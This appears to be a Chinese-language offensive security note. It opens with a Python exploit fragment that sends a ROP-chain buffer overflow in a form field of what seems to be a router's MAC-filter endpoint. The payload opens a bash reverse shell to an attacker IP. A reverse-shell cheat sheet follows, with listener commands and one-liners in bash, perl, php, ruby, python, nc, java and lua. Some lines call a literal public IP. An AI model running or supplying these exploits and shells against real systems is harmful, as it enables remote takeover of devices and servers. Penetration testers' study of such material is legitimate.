system = libc_base + 0x0005a270
gadget1 = libc_base + 0x00018298
gadget2 = libc_base + 0x00040cb8
cmd = b'bash -i >& /dev/tcp/192.168.43.13/4444 0>&1'

p = b'A' * 0xA8
p += b'DDDD'
p += b'EEEE'
p += p32(gadget1)
p += p32(system)
p += p32(gadget2)
p += cmd

d = {"macFilterType": "black", "deviceList": '\r'+ p}
r = requests.post(url, cookies = c, data = d)

print(r.text)

反弹shell大全

在服务器上开启监听:

nc -lvnp 4444
nc -vvlp 4444

目标机器开启反弹

bash版本:

bash -i >& /dev/tcp/your_server_ip/port 0>&1

perl版本:

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

php版本:

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

ruby版本:

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

python版本:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

nc版本:

nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
nc x.x.x.x 8888|/bin/sh|nc x.x.x.x 9999

java版本:

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

lua版本:

lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"

NC版本不使用-e参数:

mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc x.x.x.x 4444 1>/tmp/backpipe
 /bin/bash -i > /dev/tcp/173.214.173.151/8080 0<&1 2>&1
 mknod backpipe p && telnet 173.214.173.151 8080 0backpipe

参考:

https://www.anquanke.com/post/id/204403

https://www.jb51.net/article/118423.htm